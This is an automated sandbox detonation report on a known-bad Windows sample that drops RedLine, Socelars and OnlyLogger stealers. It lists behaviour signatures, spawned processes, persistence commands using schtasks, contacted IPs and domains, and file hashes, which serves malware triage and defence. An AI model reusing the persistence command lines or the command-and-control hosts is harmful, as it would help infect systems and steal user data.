Analysis Overview
SHA256
611479c78035c912dd69e3cfdadbf74649bb1fce6241b7573cfb0c7a2fc2fb2f
Threat Level: Known bad
The file Service.bmpgplkoxjs was found to be: Known bad.
Malicious Activity Summary
OnlyLogger
RedLine
RedLine Payload
Modifies Windows Defender Real-time Protection settings
Process spawned unexpected child process
Socelars Payload
Socelars
Identifies VirtualBox via ACPI registry values (likely anti-VM)
OnlyLogger Payload
VMProtect packed file
Executes dropped EXE
Downloads MZ/PE file
Checks computer location settings
Loads dropped DLL
Checks BIOS information in registry
Reads user/profile data of web browsers
Looks up external IP address via web service
Writes to the Master Boot Record (MBR)
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Program Files directory
Enumerates physical storage devices
Program crash
NSIS installer
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Suspicious use of SetWindowsHookEx
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
Script User-Agent
Kills process with taskkill
Delays execution with timeout.exe
Modifies system certificate store
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-04-04 03:42
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-04-04 03:42
Reported
2022-04-04 06:12
Platform
win7-20220311-en
Max time kernel
4294211s
Max time network
143s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Service.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Reads user/profile data of web browsers
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe | C:\Users\Admin\AppData\Local\Temp\Service.exe | N/A |
| File opened for modification | C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe | C:\Users\Admin\AppData\Local\Temp\Service.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118\Blob = [blob value not present in the extracted page] | C:\Users\Admin\AppData\Local\Temp\Service.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118\Blob = [blob value not present in the extracted page] | C:\Users\Admin\AppData\Local\Temp\Service.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118 | C:\Users\Admin\AppData\Local\Temp\Service.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Service.exe
"C:\Users\Admin\AppData\Local\Temp\Service.exe"
C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe
"C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe
"C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 364
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | telegram.org | udp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| NL | 149.154.167.99:443 | telegram.org | tcp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 104.244.42.65:443 | twitter.com | tcp |
| US | 104.244.42.65:443 | twitter.com | tcp |
| US | 8.8.8.8:53 | yandex.ru | udp |
| RU | 5.255.255.70:443 | yandex.ru | tcp |
| US | 8.8.8.8:53 | repository.certum.pl | udp |
| NL | 104.110.191.14:80 | repository.certum.pl | tcp |
| NL | 212.193.30.45:80 | 212.193.30.45 | tcp |
| NL | 212.193.30.21:80 | 212.193.30.21 | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| NL | 45.144.225.57:80 | 45.144.225.57 | tcp |
| NL | 212.193.30.45:80 | 212.193.30.45 | tcp |
| NL | 45.144.225.57:80 | 45.144.225.57 | tcp |
| NL | 212.193.30.21:80 | 212.193.30.21 | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.133.233:80 | cdn.discordapp.com | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| NL | 45.144.225.57:80 | 45.144.225.57 | tcp |
| NL | 212.193.30.21:80 | 212.193.30.21 | tcp |
Files
memory/1220-54-0x0000000075DF1000-0x0000000075DF3000-memory.dmp
\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe
| MD5 | 5546c1ab6768292b78c746d9ea627f4a |
| SHA1 | be3bf3f21b6101099bcfd7203a179829aea4b435 |
| SHA256 | 93708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15 |
| SHA512 | 90d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f |
memory/1248-56-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe
| MD5 | 5546c1ab6768292b78c746d9ea627f4a |
| SHA1 | be3bf3f21b6101099bcfd7203a179829aea4b435 |
| SHA256 | 93708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15 |
| SHA512 | 90d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f |
memory/1520-59-0x0000000000000000-mapping.dmp
memory/392-60-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 81180798f4d48d852ec031c3eed10781 |
| SHA1 | b66bbc8d7a8e5e0c65b0d9c624f2c13e6bfe8c61 |
| SHA256 | f901a508db08da3d9cc47b3eade0ddc2bbb273b92cccecfe26df7a6df9f9e4bc |
| SHA512 | 4de8e91721ce37693c410a38ee5fb73ca260b8006904916fbb1892114918b2ced1bfb1d5a4195e666d94ae1fdfbef4932c128b5c2e8e76036869ea11a1a31c58 |
C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe
| MD5 | 5546c1ab6768292b78c746d9ea627f4a |
| SHA1 | be3bf3f21b6101099bcfd7203a179829aea4b435 |
| SHA256 | 93708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15 |
| SHA512 | 90d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f |
memory/1248-63-0x0000000003F10000-0x00000000040CF000-memory.dmp
\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe
| MD5 | 3f22bd82ee1b38f439e6354c60126d6d |
| SHA1 | 63b57d818f86ea64ebc8566faeb0c977839defde |
| SHA256 | 265c2ddc8a21e6fa8dfaa38ef0e77df8a2e98273a1abfb575aef93c0cc8ee96a |
| SHA512 | b73e8e17e5e99d0e9edfb690ece8b0c15befb4d48b1c4f2fe77c5e3daf01df35858c06e1403a8636f86363708b80123d12122cb821a86b575b184227c760988f |
memory/1548-65-0x0000000000000000-mapping.dmp
C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe
| MD5 | 3f22bd82ee1b38f439e6354c60126d6d |
| SHA1 | 63b57d818f86ea64ebc8566faeb0c977839defde |
| SHA256 | 265c2ddc8a21e6fa8dfaa38ef0e77df8a2e98273a1abfb575aef93c0cc8ee96a |
| SHA512 | b73e8e17e5e99d0e9edfb690ece8b0c15befb4d48b1c4f2fe77c5e3daf01df35858c06e1403a8636f86363708b80123d12122cb821a86b575b184227c760988f |
memory/700-67-0x0000000000000000-mapping.dmp
\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe
| MD5 | 5546c1ab6768292b78c746d9ea627f4a |
| SHA1 | be3bf3f21b6101099bcfd7203a179829aea4b435 |
| SHA256 | 93708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15 |
| SHA512 | 90d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f |
\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe
| MD5 | 5546c1ab6768292b78c746d9ea627f4a |
| SHA1 | be3bf3f21b6101099bcfd7203a179829aea4b435 |
| SHA256 | 93708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15 |
| SHA512 | 90d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f |
\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe
| MD5 | 5546c1ab6768292b78c746d9ea627f4a |
| SHA1 | be3bf3f21b6101099bcfd7203a179829aea4b435 |
| SHA256 | 93708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15 |
| SHA512 | 90d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f |
\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe
| MD5 | 5546c1ab6768292b78c746d9ea627f4a |
| SHA1 | be3bf3f21b6101099bcfd7203a179829aea4b435 |
| SHA256 | 93708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15 |
| SHA512 | 90d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f |
\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe
| MD5 | 5546c1ab6768292b78c746d9ea627f4a |
| SHA1 | be3bf3f21b6101099bcfd7203a179829aea4b435 |
| SHA256 | 93708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15 |
| SHA512 | 90d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f |
Analysis: behavioral2
Detonation Overview
Submitted
2022-04-04 03:42
Reported
2022-04-04 06:15
Platform
win10v2004-20220310-en
Max time kernel
58s
Max time network
154s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
OnlyLogger
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe | N/A |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe | N/A |
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Socelars
Socelars Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
OnlyLogger Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Executes dropped EXE
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zSFBC2.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-8865F.tmp\setup.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Service.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-N4MTP.tmp\SUsOP56v2IWwb71Bz51Cg1sx.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-8865F.tmp\setup.tmp | N/A |
Reads user/profile data of web browsers
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | checkip.amazonaws.com | N/A | N/A |
| N/A | checkip.amazonaws.com | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\Pictures\Adobe Films\8AyDk7NAPV0v24oDY1Q7VVXZ.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe | C:\Users\Admin\AppData\Local\Temp\Service.exe | N/A |
| File opened for modification | C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe | C:\Users\Admin\AppData\Local\Temp\Service.exe | N/A |
Enumerates physical storage devices
Program crash
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zSFBC2.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zSFBC2.tmp\Install.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Service.exe
"C:\Users\Admin\AppData\Local\Temp\Service.exe"
C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe
"C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe
"C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe"
C:\Users\Admin\Pictures\Adobe Films\8AyDk7NAPV0v24oDY1Q7VVXZ.exe
"C:\Users\Admin\Pictures\Adobe Films\8AyDk7NAPV0v24oDY1Q7VVXZ.exe"
C:\Users\Admin\Pictures\Adobe Films\dOaBjSg8mYjqYth2dayxRNWl.exe
"C:\Users\Admin\Pictures\Adobe Films\dOaBjSg8mYjqYth2dayxRNWl.exe"
C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe
"C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe"
C:\Users\Admin\Pictures\Adobe Films\cZSRSHgTd8DlJEacM46ocVuM.exe
"C:\Users\Admin\Pictures\Adobe Films\cZSRSHgTd8DlJEacM46ocVuM.exe"
C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe
"C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe" -h
C:\Users\Admin\Pictures\Adobe Films\SUsOP56v2IWwb71Bz51Cg1sx.exe
"C:\Users\Admin\Pictures\Adobe Films\SUsOP56v2IWwb71Bz51Cg1sx.exe"
C:\Users\Admin\AppData\Local\Temp\7zSF25C.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\is-N4MTP.tmp\SUsOP56v2IWwb71Bz51Cg1sx.tmp
"C:\Users\Admin\AppData\Local\Temp\is-N4MTP.tmp\SUsOP56v2IWwb71Bz51Cg1sx.tmp" /SL5="$70118,140006,56320,C:\Users\Admin\Pictures\Adobe Films\SUsOP56v2IWwb71Bz51Cg1sx.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2032 -ip 2032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 624
C:\Users\Admin\Pictures\Adobe Films\tLNVEw8h3F1AhYGAczL871CL.exe
"C:\Users\Admin\Pictures\Adobe Films\tLNVEw8h3F1AhYGAczL871CL.exe"
C:\Users\Admin\AppData\Local\Temp\is-IQ2D1.tmp\5(6665____.exe
"C:\Users\Admin\AppData\Local\Temp\is-IQ2D1.tmp\5(6665____.exe" /S /UID=91
C:\Windows\system32\fondue.exe
"C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll
C:\Users\Admin\AppData\Local\Temp\7zSFBC2.tmp\Install.exe
.\Install.exe /S /site_id "525403"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2032 -ip 2032
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 644
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe
"C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2032 -ip 2032
C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe
"C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4900 -ip 4900
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 652
C:\Users\Admin\AppData\Local\Temp\siww1049.exe
"C:\Users\Admin\AppData\Local\Temp\siww1049.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4900 -s 600
C:\Users\Admin\AppData\Local\Temp\note6060.exe
"C:\Users\Admin\AppData\Local\Temp\note6060.exe"
C:\Users\Admin\AppData\Local\Temp\1.exe
"C:\Users\Admin\AppData\Local\Temp\1.exe"
C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe
